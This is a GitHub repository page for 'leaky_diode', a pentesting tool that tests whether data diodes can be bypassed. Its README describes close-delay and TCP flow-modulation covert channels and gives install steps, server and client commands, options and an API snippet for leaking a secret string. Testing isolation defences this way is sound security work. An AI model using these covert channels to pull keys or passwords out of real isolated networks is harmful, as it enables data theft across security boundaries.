Skip to content
/ leaky_diode Public

Leaky diode is a data exfiltration test tool for data diodes.

License

AGPL-3.0 license
8 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

secnot/leaky_diode

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
bin
bin
 
 
leaky_diode
leaky_diode
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
setup.py
setup.py
 
 

Repository files navigation

Leaky Diodes

Leaky diode is a data exfiltration test tool for smart data diodes, that is data diodes with support for TCP pass-through with the help of some side channel from the isolated side. The attacks used are flow modulation and/or close delay:

  • CLOSE DELAY uses the delay between the request of one the secret's bits and the time the server closes the connection to encode the bit value. (i.e.- 10 seconds delay means a 0, 30 seconds delay a 1)

  • FLOW MODULATION uses tcp flow control mechanism to encode secret's bits as a transfer speed. For example if the the bit requested by the client is 1 the server throttles the speed to 300KB/s, if it's 0 to 100KB/s. The advantage of this attack is that using a single connection makes it harder to detect.

Installation

Download the package or clone the repository, and then install with:

python3 setup.py install

or use pypi:

pip3 install leaky_diode --user

or

sudo pip3 install leaky_diode

the path to the scripts if not installed as root will be:

/home/[username]/.local/bin/leaky_client
/home/[username]/.local/bin/leaky_server

Usage

On the isolated side launch the server:

leaky_server public_ip port 'secret string that needs leaking'

On the untrusted side launch the client and select one of the attacks,

leaky_client server_ip server_port --mode flow --partial

or

leaky_client server_ip server_port --mode close --partial

And just wait a few minutes to receive the first byte (it's the slowest), if you're not sure if it's working add --verbose option so it prints messages on each received bit.

Options

usage: leaky_client [-h] [--mode mode] [--low_delay delay] [--high_delay delay] [--low_rate rate] 
					[--high_rate rate] [--sample_time time] [--settle_time time] [--partial]
                    host port

Leaky Diode is a data exfiltration test tool for data diodes

positional arguments:
  host                  Remore host address
  port                  Remote host port

optional arguments:
  -h, --help            Show this help message and exit
  --mode mode, -m mode  Attack mode 'flow' or 'close' (default: flow)
  --low_delay delay     Close delay for low bits (default: 5s) (only Close Mode)
  --high_delay delay    Close delay for high bits (default: 10s) (only Close Mode)
  --low_rate rate       Tx rate for low bits (default: 64 KB/s) (only Flow Mode)
  --high_rate rate      Tx rate for high bits (default: 300 KB/s) (only Flow Mode)
  --sample_time time    Tx rate sampling interval (default: 3.0s) (only Flow Mode)
  --settle_time time    Settle time between sending a bit request and the start of 
                        sampling (default: 8.0s) (only Flow Mode)
  --partial             Show partial results each time another byte from the secret is received
  --verbose             Show debugging messages
usage: leaky_server [-h] host port secret_string

Leaky Diode is a data exfiltration test tool for data diodes

positional arguments:
  host           Remore host address
  port           Remote host port
  secret_string  Attack mode 'flow' or 'close' (default: a secret string)

optional arguments:
  -h, --help     Show this help message and exit
  -v, --verbose  Show debugging messages

Performance

The attack throughput with the default parameters is around 1 B/min (yes, one byte per minute), you can increase it by lowering the delay times in close delay mode, and the settle/sample times in flow modulation (the default values are very conservative)

An actual exfiltration attempt using this attack could easily leak a few KB per day, too slow for large breachs, but enough for targeted attacks for keys/passwords or selected users data.

API

It is also possible to use leaky_diode as a package and include a server in your own app:

  • class LeakyServer(host, port, secret, ticks=100, max_connections=10)

    • host: (str) Listen interface ip addres ('' for all)

    • port: (int) Listen port

    • secret: (bytes) Secret to leak (max length 65535)

    • ticks: (int) Ticks per second the worker process use to throttle the connections.

    • max_connections: (int) Max concurrent connection the server can handle.

    • start(): Initialize and launch server worker processes

    • stop(): Stop server and its workers

from leaky_diode import LeakyServer

leaky_server = LeakyServer('192.168.0.10', 9000, b'some secret byte string')
leaky_server.start()

# Do something else
......

# Close server before exit
leaky_server.close()

TODO

  • Harden message parsing input validation (invalid lengths)
  • Use concurrent connection to increase exfiltration speed.
  • Tune flow modulation mode tx speeds .
  • Tune close delay mode delays.
  • Add CRC to the secret and secret length, or even better error correction.
  • Add resume capability so there is no need to get the secret in one go.
  • Add some tests.

References

  • Data Diodes Wikipedia
  • Place holder so I remember to publish a post on the attacks
  • And another on transport and streaming protocols for data diodes

About

Leaky diode is a data exfiltration test tool for data diodes.

Topics

data cybersecurity pentesting exfiltration diodes

Resources

Readme

License

AGPL-3.0 license
Activity

Stars

8 stars

Watchers

3 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages